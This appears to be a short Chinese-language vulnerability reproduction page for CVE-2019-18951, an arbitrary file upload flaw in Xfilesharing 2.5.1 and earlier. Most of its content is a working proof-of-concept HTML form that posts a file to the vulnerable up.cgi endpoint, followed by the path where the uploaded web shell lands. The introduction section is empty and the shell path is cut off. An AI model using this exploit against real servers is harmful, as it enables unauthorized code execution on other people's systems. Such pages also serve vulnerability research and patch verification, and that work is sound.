跳转至

(CVE-2019-18951)Xfilesharing 2.5.1本地文件上传getshell

一、漏洞简介

二、漏洞影响

Version: \<=2.5.1

三、复现过程

任意文件上传

&lt;form action="http://0-sec.org/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"&gt;
    &lt;input type="text" name="sid" value="joe"&gt;
    &lt;input type="file" name="file"&gt;
    &lt;input type="submit" value="Upload" name="submit"&gt;
&lt;/form&gt;

Shell : http://0-sec.org/cgi-bin/temp/joe/she